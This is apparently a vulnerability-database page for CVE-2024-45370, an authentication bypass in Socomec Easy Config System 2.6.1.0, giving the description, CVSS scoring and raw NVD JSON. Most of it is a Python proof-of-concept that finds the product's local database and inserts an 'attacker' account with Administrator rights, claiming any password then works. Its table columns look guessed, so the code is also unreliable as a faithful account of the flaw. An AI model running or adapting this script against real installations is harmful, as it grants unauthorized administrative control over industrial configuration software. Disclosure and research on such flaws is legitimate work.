Security Vulnerability Report
中文
CVE-2024-45370 CVSS 7.3 HIGH

CVE-2024-45370

Published: 2025-12-01 16:15:50
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

An authentication bypass vulnerability exists in the User profile management functionality of Socomec Easy Config System 2.6.1.0. A specially crafted database record can lead to unauthorized access. An attacker can modify a local database to trigger this vulnerability.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Socomec Easy Config System 2.6.1.0
Socomec Easy Config System <= 2.6.1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2024-45370 PoC - Socomec Easy Config System Authentication Bypass # This PoC demonstrates the authentication bypass via database manipulation import sqlite3 import os import shutil from datetime import datetime def backup_database(db_path): """Create a backup of the original database""" backup_path = f"{db_path}.backup_{datetime.now().strftime('%Y%m%d_%H%M%S')}" shutil.copy2(db_path, backup_path) print(f"[+] Database backed up to: {backup_path}") return backup_path def exploit_auth_bypass(db_path): """ Exploit authentication bypass in Socomec Easy Config System by modifying user profile database records """ try: # Connect to the database conn = sqlite3.connect(db_path) cursor = conn.cursor() # List existing tables cursor.execute("SELECT name FROM sqlite_master WHERE type='table';") tables = cursor.fetchall() print(f"[+] Found tables: {[t[0] for t in tables]}") # Check for user profile related tables for table in tables: table_name = table[0] if 'user' in table_name.lower() or 'profile' in table_name.lower(): print(f"\n[+] Analyzing table: {table_name}") # Get table schema cursor.execute(f"PRAGMA table_info({table_name});") columns = cursor.fetchall() print(f"[+] Columns: {[c[1] for c in columns]}") # Get current records cursor.execute(f"SELECT * FROM {table_name} LIMIT 10;") records = cursor.fetchall() print(f"[+] Current records count: {len(records)}") # Inject malicious user profile record # This crafted record can bypass authentication malicious_sql = f""" INSERT OR REPLACE INTO {table_name} (id, username, role, auth_status, is_admin, created_at, modified_at) VALUES ( 999, 'attacker', 'Administrator', 1, 1, datetime('now'), datetime('now') ); """ try: cursor.execute(malicious_sql) conn.commit() print(f"[+] Malicious record injected successfully") print(f"[+] Auth bypass: username='attacker' with Administrator privileges") except Exception as e: print(f"[-] Injection failed: {e}") conn.close() return True except Exception as e: print(f"[-] Exploit failed: {e}") return False def main(): # Common database paths for Socomec Easy Config System db_paths = [ r"C:\Program Files\Socomec\EasyConfig\data\config.db", r"C:\Program Files\Socomec\EasyConfig\data\users.db", r"C:\ProgramData\Socomec\EasyConfig\config.db", "/opt/socomec/easyconfig/data/config.db", "/var/lib/socomec/easyconfig/config.db" ] print("=" * 60) print("CVE-2024-45370 - Socomec Easy Config System Auth Bypass") print("=" * 60) target_db = None for path in db_paths: if os.path.exists(path): target_db = path print(f"[+] Found target database: {path}") break if not target_db: print("[-] Database not found. Please provide the correct path.") target_db = input("Enter database path: ") if os.path.exists(target_db): backup_database(target_db) exploit_auth_bypass(target_db) print("\n[!] After exploitation, restart the application and login with:") print(" Username: attacker") print(" Password: (any password or blank)") else: print(f"[-] Database not found at: {target_db}") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-45370", "sourceIdentifier": "[email protected]", "published": "2025-12-01T16:15:49.757", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "An authentication bypass vulnerability exists in the User profile management functionality of Socomec Easy Config System 2.6.1.0. A specially crafted database record can lead to unauthorized access. An attacker can modify a local database to trigger this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:L/I:H/A:N", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.0, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-302"}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2024-2117", "source": "[email protected]"}, {"url": "https://www.socomec.fr/sites/default/files/2025-11/CVE-2024-45370---ECS-2610---CVSS31_VULNERABILITIES_2025-11-19-09-45-29_English_PLURI_3.pdf", "source": "[email protected]"}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2024-2117", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.